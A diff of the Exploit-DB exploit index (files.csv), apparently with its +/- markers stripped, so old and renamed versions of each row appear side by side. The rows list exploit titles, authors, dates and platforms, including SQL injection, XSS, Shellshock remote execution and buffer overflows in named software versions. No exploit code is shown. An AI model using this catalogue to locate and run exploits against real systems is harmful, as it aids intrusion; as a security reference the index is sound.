34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0
34424,platforms/php/webapps/34424.txt,"Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0
34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos,0
34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0
34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0
@ -31508,7 +31518,7 @@ id,file,description,date,author,platform,type,port
34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0
34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
34922,platforms/php/webapps/34922.txt,"Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0
@ -31861,7 +31871,7 @@ id,file,description,date,author,platform,type,port
35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0
35285,platforms/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
35286,platforms/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0
35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
35287,platforms/php/webapps/35287.txt,"Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
35274,platforms/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,php,webapps,80
35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80
@ -31875,7 +31885,7 @@ id,file,description,date,author,platform,type,port
35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80
35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337
35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
35303,platforms/php/webapps/35303.txt,"Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0
35305,platforms/php/webapps/35305.txt,"ACollab - 't' Parameter SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0
35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0
@ -31920,7 +31930,7 @@ id,file,description,date,author,platform,type,port
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0
35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot Parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0
35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0
35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
35346,platforms/php/webapps/35346.txt,"Wordpress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0
35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
@ -32012,7 +32022,7 @@ id,file,description,date,author,platform,type,port
35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0
35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0
35446,platforms/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote,0
35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0
35447,platforms/php/webapps/35447.txt,"Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0
35474,platforms/windows/remote/35474.py,"Microsoft Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0
35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0
35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0
@ -32598,7 +32608,7 @@ id,file,description,date,author,platform,type,port
36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0
36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0
36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0
36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0
36086,platforms/php/webapps/36086.txt,"Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0
36087,platforms/php/webapps/36087.txt,"WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0
36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80
36090,platforms/php/webapps/36090.txt,"ClickCMS - Denial of Service / CAPTCHA Bypass",2011-08-29,MustLive,php,webapps,0
@ -32623,7 +32633,7 @@ id,file,description,date,author,platform,type,port
36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0
36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0
36112,platforms/php/webapps/36112.txt,"Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0
36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0
36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0
@ -33106,7 +33116,7 @@ id,file,description,date,author,platform,type,port
36615,platforms/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80
36617,platforms/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
36618,platforms/php/webapps/36618.txt,"Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0
36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos,0
@ -33160,7 +33170,7 @@ id,file,description,date,author,platform,type,port
36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80
36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80
36674,platforms/php/webapps/36674.txt,"Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80
36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injection",2015-04-08,LiquidWorm,php,webapps,80
36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80
36677,platforms/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80
@ -33556,7 +33566,7 @@ id,file,description,date,author,platform,type,port
37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0
37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0
37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0
37253,platforms/php/webapps/37253.txt,"Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0
37254,platforms/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80
37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0
37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0
@ -33572,7 +33582,7 @@ id,file,description,date,author,platform,type,port
37110,platforms/java/webapps/37110.py,"Apache JackRabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080
37111,platforms/php/webapps/37111.txt,"WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80
37112,platforms/php/webapps/37112.txt,"WordPress Plugin church_admin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80
37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80
37113,platforms/php/webapps/37113.txt,"Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80
37114,platforms/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80
37115,platforms/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0
37116,platforms/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0
@ -33628,13 +33638,13 @@ id,file,description,date,author,platform,type,port
37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0
37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0
37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",hardware,webapps,0
37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37173,platforms/php/webapps/37173.txt,"Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37174,platforms/php/webapps/37174.txt,"WordPress Plugin Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37175,platforms/php/webapps/37175.txt,"Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37176,platforms/php/webapps/37176.txt,"Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37177,platforms/php/webapps/37177.txt,"WordPress Plugin CataBlog 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37178,platforms/php/webapps/37178.txt,"Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37179,platforms/php/webapps/37179.txt,"Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37180,platforms/php/webapps/37180.txt,"WordPress Plugin NewsLetter Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0
37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0
@ -33642,19 +33652,19 @@ id,file,description,date,author,platform,type,port
37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
37187,platforms/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow (PoC)",2015-06-03,metacom,windows,dos,21
37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0
37189,platforms/php/webapps/37189.txt,"Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37189,platforms/php/webapps/37189.txt,"Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37190,platforms/php/webapps/37190.txt,"Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37191,platforms/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 for - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37193,platforms/php/webapps/37193.txt,"Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37194,platforms/php/webapps/37194.txt,"Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37196,platforms/php/webapps/37196.txt,"WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0
37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0
37200,platforms/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80
37201,platforms/php/webapps/37201.txt,"WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37202,platforms/php/webapps/37202.txt,"Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37203,platforms/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37204,platforms/php/webapps/37204.txt,"WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0
@ -34013,7 +34023,7 @@ id,file,description,date,author,platform,type,port
37597,platforms/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,hardware,remote,443
37598,platforms/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,5900
37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,windows,remote,0
37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,617
37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (2)",2015-07-13,Metasploit,multiple,remote,617
37601,platforms/php/webapps/37601.txt,"WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80
37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
37603,platforms/php/webapps/37603.txt,"WordPress Plugin CP Contact Form with Paypal 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
@ -34541,7 +34551,7 @@ id,file,description,date,author,platform,type,port
38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0
38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox Beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0
38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0
38167,platforms/php/webapps/38167.php,"Multiple WordPress Themes WPScientist - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0
38167,platforms/php/webapps/38167.php,"Multiple WordPress WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0
38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0
38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0
38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0
@ -34551,7 +34561,7 @@ id,file,description,date,author,platform,type,port
38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0
38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0
38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
38176,platforms/php/webapps/38176.txt,"EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
38176,platforms/php/webapps/38176.txt,"Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
38177,platforms/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos,0
38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
@ -34746,7 +34756,7 @@ id,file,description,date,author,platform,type,port
38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0
38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0
38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200
38384,platforms/windows/remote/38384.txt,"Avast AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0
38384,platforms/windows/remote/38384.txt,"Avast! AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0
38385,platforms/php/webapps/38385.txt,"KindEditor - Multiple Arbitrary File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0
38386,platforms/php/webapps/38386.txt,"PHPBoost - Arbitrary File Upload / Information Disclosure",2013-03-11,KedAns-Dz,php,webapps,0
38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",multiple,remote,0
@ -34957,7 +34967,7 @@ id,file,description,date,author,platform,type,port
38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0
38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0
38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0
38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0
38608,platforms/php/webapps/38608.txt,"Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0
38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0
38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
@ -34988,7 +34998,7 @@ id,file,description,date,author,platform,type,port
38636,platforms/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",multiple,remote,0
38637,platforms/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",multiple,remote,0
38638,platforms/php/webapps/38638.txt,"Mintboard - Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0
38639,platforms/php/webapps/38639.txt,"miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0
38639,platforms/php/webapps/38639.txt,"Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0
38640,platforms/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0
38641,platforms/multiple/webapps/38641.rb,"JSSE - SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
38643,platforms/php/webapps/38643.txt,"WordPress Plugin Pie Register - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
